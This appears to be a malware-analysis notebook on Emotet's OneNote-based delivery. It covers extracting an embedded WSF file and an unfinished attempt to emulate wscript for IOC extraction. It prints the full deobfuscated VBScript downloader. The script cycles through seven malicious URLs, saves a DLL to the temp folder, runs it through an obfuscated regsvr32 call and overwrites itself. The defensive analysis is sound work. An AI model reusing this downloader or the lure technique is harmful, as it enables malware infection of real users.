# OneNote WSF Malware (Emotet)
> Rapidly extracting IOCs from Onenote malware delivery

- toc: true 
- badges: true
- categories: [onenote,emotet,wsf,triage]


## Overview

Recently Emotet has been using OneNote files as their pre-binary dropper/downloader. The delivery chain appears to be...

- OneNote
- Embeded WSF file
- Download DLL (Emotet first stage)

Our goal will be to construct a full static IOC extraction tool for these files!

![](https://i.imgur.com/QK13VyG.jpg)

## Sample
`1c3a7f886a544fc56e91b7232402a1d86282165e2699b7bf36e2b1781cb2adc2` [Malshare](https://bazaar.abuse.ch/sample/1c3a7f886a544fc56e91b7232402a1d86282165e2699b7bf36e2b1781cb2adc2/)

## References

- [OneDump python tool from Didier <3 ](https://blog.didierstevens.com/2023/01/22/new-tool-onedump-py/)
- [pyOneNote python tool](https://github.com/DissectMalware/pyOneNote)
- OneNote [ref docs (pdf)](https://interoperability.blob.core.windows.net/files/MS-ONE/%5bMS-ONE%5d.pdf)


## OneNote File Format

- OneNote files use the file extension `.one`
- These documents can contain other files (similar to a .doc file or .xls)
  - Not sure if there are limits to the types of files that can be included but `.wsf` files can be included
- The current method used to trick users into executing these embeded files is to place them "under" an image that request the user double click for some reason... the double click will then be passed on to the embeded file. 
  - Because these files are lauched using a "double click" they must have a valid file extension (note for defenders)


## Analysis

- Extract all embedded files from OneNote document
- Search for executable file extentions on extracted files
- Triage these files

### OneNote Triage

- inside of onenote is a `.wsf` file which contains an obfuscated script
- replacing the `execute` command with a simple file print we get the deobfuscated script

```
urlcount=1
set fsobject=createobject("scripting.filesystemobject")
currentdir=fsobject.getparentfoldername(wscript.scriptfullname)
set request=createobject("winhttp.winhttprequest.5.1")
set file=wscript.createobject("shell.application")
set strout=createobject("adodb.stream")
useragent="mozilla/5.0 (windows nt 6.1; wow64; rv:58.0) gecko/20100101 firefox/58.0"
ouch= chr(115-1)+"e"+"gs"&"v"+chr(113+1)+"3"+"2."+chr(101)+"x"+chr(101)+" " + ""
pat3= currentdir+"\"+fsobject.gettempname+".dll"
loiu=ouch+ """"+ pat3 + """"
set triplett=createobject("wscript.shell")
url1 = "https://penshorn.org/admin/Ses8712iGR8du/"
url2 = "https://bbvoyage.com/useragreement/ElKHvb4QIQqSrh6Hqm/"
url3 = "https://www.gomespontes.com.br/logs/pd/"
url4 = "https://portalevolucao.com/GerarBoleto/fLIOoFbFs1jHtX/"
url5 = "http://ozmeydan.com/cekici/9/"
url6 = "http://softwareulike.com/cWIYxWMPkK/"
url7 = "http://wrappixels.com/wp-admin/GdIA2oOQEiO5G/"
do
call dow
loop  while urlcount<8
public function dow()
on error resume next
select case urlcount
case 1
downstr=url1
case 2
downstr=url2
case 3
downstr=url3
case 4
downstr=url4
case 5
downstr=url5
case 6
downstr=url6
case 7
downstr=url7
end select
request.open "get",downstr,false
request.send
If Err.Number<>0 then
urlcount=urlcount+1
else
strout.open
strout.type=1
if vare=0 then
cad=1
else
far=2
end if
strout.write (request.responsebody)
if roum=0 then
sio=sio+1
else
end if
strout.savetofile pat3
strout.close
armour = "samcom."
set fsobject=createobject("scripting.filesystemobject")
Set f = fsobject.GetFile(pat3)
GetFileSize = clng(f.size/1024)
If GetFileSize > 150 Then
call roize
urlcount = 8
else
pat3= currentdir+"\"+fsobject.gettempname+".dll"
loiu=ouch+ """"+ pat3 + """"
urlcount=urlcount+1
end if
end if
end function
public function roize
if derti=0 then
sem=sem+1
else
end if
urlcount = 8
triplett.run (loiu),0,true
cor = "samo"
set fsobject=createobject("scripting.filesystemobject")
set textstream = fsobject.createtextfile(""+wscript.scriptfullname+"")
textstream.write ("badum tss")
if rotate = 12 then
sable = 54 + 22
else
routtt = "carry"
end if
end function
```

## Emulation?

Instead of running this live and modifying the script, can we get away with emulating `wscript.exe` and running the script in an emulator?

In [25]:
from dumpulator import Dumpulator
from dumpulator import *
from dumpulator.native import *
from dumpulator.handles import *
from dumpulator.memory import *


dmp_file = '/tmp/wscript_scripttree.dmp'


@syscall
def ZwQuerySystemInformation(dp: Dumpulator,
                             SystemInformationClass: Annotated[SYSTEM_INFORMATION_CLASS, SAL("_In_")],
                             SystemInformation: Annotated[PVOID, SAL("_Out_writes_bytes_opt_(SystemInformationLength)")],
                             SystemInformationLength: Annotated[ULONG, SAL("_In_")],
                             ReturnLength: Annotated[P[ULONG], SAL("_Out_opt_")]
                             ):
    return STATUS_SUCCESS


@syscall
def ZwUnmapViewOfSectionEx(dp: Dumpulator,
                           ProcessHandle: Annotated[HANDLE, SAL("_In_")],
                           BaseAddress: Annotated[PVOID, SAL("_In_opt_")],
                           Flags: Annotated[ULONG, SAL("_In_")]
                           ):
    return STATUS_SUCCESS


@syscall
def ZwOpenKey(dp: Dumpulator,
              KeyHandle: Annotated[P[HANDLE], SAL("_Out_")],
              DesiredAccess: Annotated[ACCESS_MASK, SAL("_In_")],
              ObjectAttributes: Annotated[P[OBJECT_ATTRIBUTES], SAL("_In_")]
              ):
    key_name = ObjectAttributes[0].ObjectName[0].read_str()
    print(key_name)
    assert DesiredAccess == 0x20019
    handle = dp.handles.open_file(key_name)
    assert handle is not None
    KeyHandle.write_ptr(handle)
    return STATUS_SUCCESS



dp = Dumpulator(dmp_file, quiet=True)
print("loaded")


loaded


In [26]:
dp.start(dp.regs.rip)

Exception thrown during syscall implementation, stopping emulation!
forced exit memory operation 21 of 0x4fe2[0x1] = 0x0


NotImplementedError: 

### Some Thoughts on Emulation
- We want to dump early enough that we can modify the script code before it is parsed 
- We want to dump late enough that most of the setup is done and we don't have to implement much in dumpulator
- Currently we are having some issues with the sweet spot for a dump becuase wscript -> scobj and scobj uses an abstrcation to implement the parser
- When we dump before the parser we still have some thread stuff causing issues (maybe not fixable???)
- TODO: look into vbscript (without wscript wrapper) is it simpler?? 